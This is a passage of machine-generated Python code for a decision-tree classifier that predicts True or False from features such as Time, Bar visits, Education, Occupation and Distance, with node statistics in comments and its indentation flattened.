# {"feature": "Time", "instances": 34, "metric_value": 0.3013, "depth": 10}
if obj[1]<=3:
# {"feature": "Restaurant20to50", "instances": 27, "metric_value": 0.2326, "depth": 11}
if obj[10]<=2.0:
# {"feature": "Education", "instances": 25, "metric_value": 0.2, "depth": 12}
if obj[6]<=2:
# {"feature": "Gender", "instances": 18, "metric_value": 0.2771, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[6]>2:
return 'False'
else: return 'False'
elif obj[10]>2.0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[6]<=3:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>3:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.2143, "depth": 11}
if obj[10]<=0.0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.25, "depth": 12}
if obj[3]<=0:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[6]<=1:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[10]>0.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Time", "instances": 28, "metric_value": 0.3636, "depth": 9}
if obj[1]>0:
# {"feature": "Education", "instances": 22, "metric_value": 0.3636, "depth": 10}
if obj[6]<=2:
# {"feature": "Gender", "instances": 16, "metric_value": 0.2727, "depth": 11}
if obj[3]>0:
# {"feature": "Children", "instances": 11, "metric_value": 0.3636, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[10]<=0.0:
return 'False'
elif obj[10]>0.0:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[6]>2:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[4]>5:
# {"feature": "Occupation", "instances": 74, "metric_value": 0.3997, "depth": 7}
if obj[7]<=11:
# {"feature": "Time", "instances": 62, "metric_value": 0.3637, "depth": 8}
if obj[1]<=1:
# {"feature": "Education", "instances": 42, "metric_value": 0.2961, "depth": 9}
if obj[6]>0:
# {"feature": "Gender", "instances": 29, "metric_value": 0.2318, "depth": 10}
if obj[3]>0:
# {"feature": "Restaurant20to50", "instances": 16, "metric_value": 0.2946, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Children", "instances": 14, "metric_value": 0.3333, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.375, "depth": 13}
if obj[11]>0:
return 'False'
elif obj[11]<=0:
return 'False'
else: return 'False'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.25, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>1.0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 13, "metric_value": 0.1231, "depth": 11}
if obj[10]<=1.0:
return 'False'
elif obj[10]>1.0:
# {"feature": "Children", "instances": 5, "metric_value": 0.32, "depth": 12}
if obj[5]<=1:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Direction_same", "instances": 13, "metric_value": 0.3192, "depth": 10}
if obj[11]<=0:
# {"feature": "Children", "instances": 8, "metric_value": 0.1667, "depth": 11}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[3]<=1:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[10]<=0.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.3, "depth": 11}
if obj[10]>0.0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.3333, "depth": 12}
if obj[3]<=0:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[5]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[1]>1:
# {"feature": "Education", "instances": 20, "metric_value": 0.419, "depth": 9}
if obj[6]<=2:
# {"feature": "Children", "instances": 14, "metric_value": 0.3673, "depth": 10}
if obj[5]>0:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.1429, "depth": 11}
if obj[10]>0.0:
return 'False'
elif obj[10]<=0.0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.4286, "depth": 11}
if obj[10]>0.0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>2:
# {"feature": "Children", "instances": 6, "metric_value": 0.2667, "depth": 10}
if obj[5]>0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.2667, "depth": 11}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=2.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[5]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[7]>11:
# {"feature": "Restaurant20to50", "instances": 12, "metric_value": 0.419, "depth": 8}
if obj[10]>0.0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.381, "depth": 9}
if obj[11]<=0:
# {"feature": "Education", "instances": 6, "metric_value": 0.3333, "depth": 10}
if obj[6]<=1:
# {"feature": "Time", "instances": 4, "metric_value": 0.3333, "depth": 11}
if obj[1]>0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[3]<=1:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[5]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
return 'False'
else: return 'False'
elif obj[6]>1:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Time", "instances": 5, "metric_value": 0.2, "depth": 9}
if obj[1]>0:
return 'True'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 10}
if obj[3]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=1:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[6]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[8]>1.0:
# {"feature": "Occupation", "instances": 86, "metric_value": 0.3849, "depth": 6}
if obj[7]>5:
# {"feature": "Gender", "instances": 64, "metric_value": 0.4295, "depth": 7}
if obj[3]<=0:
# {"feature": "Education", "instances": 55, "metric_value": 0.3958, "depth": 8}
if obj[6]<=2:
# {"feature": "Direction_same", "instances": 49, "metric_value": 0.3444, "depth": 9}
if obj[11]<=0:
# {"feature": "Restaurant20to50", "instances": 38, "metric_value": 0.2653, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Age", "instances": 25, "metric_value": 0.3537, "depth": 11}
if obj[4]>0:
# {"feature": "Time", "instances": 19, "metric_value": 0.4334, "depth": 12}
if obj[1]>0:
# {"feature": "Children", "instances": 17, "metric_value": 0.4777, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
elif obj[4]<=0:
return 'False'
else: return 'False'
elif obj[10]>1.0:
return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Time", "instances": 11, "metric_value": 0.297, "depth": 10}
if obj[1]<=0:
# {"feature": "Age", "instances": 6, "metric_value": 0.1667, "depth": 11}
if obj[4]>0:
return 'True'
elif obj[4]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.0, "depth": 12}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]>0:
# {"feature": "Age", "instances": 5, "metric_value": 0.2, "depth": 11}
if obj[4]>0:
return 'False'
elif obj[4]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[6]>2:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2667, "depth": 9}
if obj[11]<=0:
# {"feature": "Time", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[1]<=1:
# {"feature": "Age", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[4]<=0:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[10]<=1.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>1:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[3]>0:
# {"feature": "Education", "instances": 9, "metric_value": 0.3333, "depth": 8}
if obj[6]<=0:
# {"feature": "Time", "instances": 8, "metric_value": 0.3333, "depth": 9}
if obj[1]<=2:
# {"feature": "Children", "instances": 6, "metric_value": 0.2222, "depth": 10}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
# {"feature": "Age", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[4]<=1:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=2.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>2:
# {"feature": "Children", "instances": 2, "metric_value": 0.0, "depth": 10}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[6]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[7]<=5:
# {"feature": "Time", "instances": 22, "metric_value": 0.0909, "depth": 7}
if obj[1]>0:
return 'False'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.3333, "depth": 8}
if obj[3]<=0:
# {"feature": "Education", "instances": 3, "metric_value": 0.0, "depth": 9}
if obj[6]>0:
return 'False'
elif obj[6]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>1:
# {"feature": "Distance", "instances": 527, "metric_value": 0.4617, "depth": 4}
if obj[12]>1:
# {"feature": "Bar", "instances": 356, "metric_value": 0.4414, "depth": 5}
if obj[8]<=2.0:
# {"feature": "Time", "instances": 323, "metric_value": 0.4297, "depth": 6}
if obj[1]>0:
# {"feature": "Age", "instances": 252, "metric_value": 0.4492, "depth": 7}
if obj[4]>1:
# {"feature": "Occupation", "instances": 178, "metric_value": 0.4665, "depth": 8}
if obj[7]<=16:
# {"feature": "Gender", "instances": 164, "metric_value": 0.4816, "depth": 9}
if obj[3]>0:
# {"feature": "Restaurant20to50", "instances": 83, "metric_value": 0.4907, "depth": 10}
if obj[10]>0.0:
# {"feature": "Education", "instances": 59, "metric_value": 0.4734, "depth": 11}
if obj[6]<=3:
# {"feature": "Children", "instances": 53, "metric_value": 0.4936, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 37, "metric_value": 0.4909, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>3:
# {"feature": "Children", "instances": 6, "metric_value": 0.0, "depth": 12}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Education", "instances": 24, "metric_value": 0.4127, "depth": 11}
if obj[6]>0:
# {"feature": "Children", "instances": 21, "metric_value": 0.4505, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 13, "metric_value": 0.497, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 81, "metric_value": 0.4567, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Education", "instances": 64, "metric_value": 0.4742, "depth": 11}
if obj[6]<=1:
# {"feature": "Children", "instances": 37, "metric_value": 0.4556, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 28, "metric_value": 0.4592, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>1:
# {"feature": "Children", "instances": 27, "metric_value": 0.4937, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.4922, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.4959, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Children", "instances": 17, "metric_value": 0.3252, "depth": 11}
if obj[5]>0:
# {"feature": "Education", "instances": 9, "metric_value": 0.1905, "depth": 12}
if obj[6]>0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.2449, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[6]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Education", "instances": 8, "metric_value": 0.4688, "depth": 12}
if obj[6]<=2:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.4688, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>16:
# {"feature": "Education", "instances": 14, "metric_value": 0.2143, "depth": 9}
if obj[6]<=0:
# {"feature": "Children", "instances": 8, "metric_value": 0.3, "depth": 10}
if obj[5]>0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.48, "depth": 11}
if obj[3]<=1:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[6]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=1:
# {"feature": "Occupation", "instances": 74, "metric_value": 0.3665, "depth": 8}
if obj[7]<=22:
# {"feature": "Restaurant20to50", "instances": 73, "metric_value": 0.3587, "depth": 9}
if obj[10]>-1.0:
# {"feature": "Education", "instances": 66, "metric_value": 0.3934, "depth": 10}
if obj[6]>1:
# {"feature": "Gender", "instances": 43, "metric_value": 0.4059, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 32, "metric_value": 0.3744, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 23, "metric_value": 0.3856, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.3457, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Children", "instances": 11, "metric_value": 0.3879, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=1:
# {"feature": "Gender", "instances": 23, "metric_value": 0.3401, "depth": 11}
if obj[3]>0:
# {"feature": "Children", "instances": 18, "metric_value": 0.3333, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 5, "metric_value": 0.2667, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=-1.0:
return 'True'
else: return 'True'
elif obj[7]>22:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Children", "instances": 71, "metric_value": 0.2679, "depth": 7}
if obj[5]>0:
# {"feature": "Age", "instances": 41, "metric_value": 0.3777, "depth": 8}
if obj[4]<=3:
# {"feature": "Restaurant20to50", "instances": 31, "metric_value": 0.4424, "depth": 9}
if obj[10]>-1.0:
# {"feature": "Occupation", "instances": 28, "metric_value": 0.4762, "depth": 10}
if obj[7]>0:
# {"feature": "Gender", "instances": 27, "metric_value": 0.4889, "depth": 11}
if obj[3]>0:
# {"feature": "Education", "instances": 15, "metric_value": 0.4571, "depth": 12}
if obj[6]<=2:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.4898, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[6]>2:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Education", "instances": 12, "metric_value": 0.5, "depth": 12}
if obj[6]>0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]<=0:
return 'True'
else: return 'True'
elif obj[10]<=-1.0:
return 'False'
else: return 'False'
elif obj[4]>3:
return 'True'
else: return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>2.0:
# {"feature": "Children", "instances": 33, "metric_value": 0.4127, "depth": 6}
if obj[5]<=0:
# {"feature": "Time", "instances": 21, "metric_value": 0.4286, "depth": 7}
if obj[1]>0:
# {"feature": "Age", "instances": 18, "metric_value": 0.4643, "depth": 8}
if obj[4]<=1:
# {"feature": "Occupation", "instances": 14, "metric_value": 0.4762, "depth": 9}
if obj[7]>2:
# {"feature": "Education", "instances": 8, "metric_value": 0.4667, "depth": 10}
if obj[6]<=0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.48, "depth": 11}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[10]<=0.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]<=2:
# {"feature": "Gender", "instances": 6, "metric_value": 0.4444, "depth": 10}
if obj[3]>0:
# {"feature": "Education", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[6]<=4:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Education", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[6]<=2:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>1:
# {"feature": "Education", "instances": 4, "metric_value": 0.3333, "depth": 9}
if obj[6]<=1:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 10}
if obj[3]<=0:
# {"feature": "Occupation", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[7]<=18:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=2.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Age", "instances": 12, "metric_value": 0.2381, "depth": 7}
if obj[4]>2:
# {"feature": "Time", "instances": 7, "metric_value": 0.381, "depth": 8}
if obj[1]>0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.4444, "depth": 9}
if obj[3]<=0:
# {"feature": "Education", "instances": 6, "metric_value": 0.4444, "depth": 10}
if obj[6]<=2:
# {"feature": "Occupation", "instances": 6, "metric_value": 0.4444, "depth": 11}
if obj[7]<=12:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.4444, "depth": 12}
if obj[10]<=2.0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
elif obj[4]<=2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[12]<=1:
# {"feature": "Occupation", "instances": 171, "metric_value": 0.4644, "depth": 5}
if obj[7]>1.3264107549745603:
# {"feature": "Age", "instances": 137, "metric_value": 0.4449, "depth": 6}
if obj[4]<=2:
# {"feature": "Education", "instances": 76, "metric_value": 0.4768, "depth": 7}
if obj[6]<=3:
# {"feature": "Restaurant20to50", "instances": 67, "metric_value": 0.4602, "depth": 8}
if obj[10]>-1.0:
# {"feature": "Time", "instances": 59, "metric_value": 0.4807, "depth": 9}
if obj[1]<=3:
# {"feature": "Children", "instances": 43, "metric_value": 0.4776, "depth": 10}
if obj[5]<=0:
# {"feature": "Bar", "instances": 27, "metric_value": 0.451, "depth": 11}
if obj[8]>0.0:
# {"feature": "Gender", "instances": 14, "metric_value": 0.3929, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 12, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]<=0.0:
# {"feature": "Gender", "instances": 13, "metric_value": 0.3538, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[5]>0:
# {"feature": "Bar", "instances": 16, "metric_value": 0.3, "depth": 11}
if obj[8]<=0.0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.3167, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2778, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>0.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>3:
# {"feature": "Gender", "instances": 16, "metric_value": 0.4042, "depth": 10}
if obj[3]<=0:
# {"feature": "Bar", "instances": 10, "metric_value": 0.4444, "depth": 11}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 9, "metric_value": 0.4815, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[8]>1.0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Children", "instances": 6, "metric_value": 0.2667, "depth": 11}
if obj[5]>0:
# {"feature": "Bar", "instances": 5, "metric_value": 0.32, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[5]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[10]<=-1.0:
# {"feature": "Bar", "instances": 8, "metric_value": 0.2, "depth": 9}
if obj[8]<=-1.0:
# {"feature": "Time", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[1]>0:
# {"feature": "Children", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[5]>0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]<=0:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
elif obj[8]>-1.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>3:
# {"feature": "Bar", "instances": 9, "metric_value": 0.0, "depth": 8}
if obj[8]<=0.0:
return 'True'
elif obj[8]>0.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[4]>2:
# {"feature": "Restaurant20to50", "instances": 61, "metric_value": 0.3305, "depth": 7}
if obj[10]>0.0:
# {"feature": "Time", "instances": 38, "metric_value": 0.1887, "depth": 8}
if obj[1]>0:
# {"feature": "Bar", "instances": 31, "metric_value": 0.1105, "depth": 9}
if obj[8]<=2.0:
# {"feature": "Children", "instances": 27, "metric_value": 0.0673, "depth": 10}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
# {"feature": "Gender", "instances": 11, "metric_value": 0.1455, "depth": 11}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
# {"feature": "Education", "instances": 5, "metric_value": 0.2667, "depth": 12}
if obj[6]<=2:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[6]>2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[8]>2.0:
# {"feature": "Children", "instances": 4, "metric_value": 0.3333, "depth": 10}
if obj[5]<=0:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[6]>1:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=1:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Children", "instances": 7, "metric_value": 0.2143, "depth": 9}
if obj[5]>0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.0, "depth": 10}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[5]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]<=0.0:
# {"feature": "Bar", "instances": 23, "metric_value": 0.4174, "depth": 8}
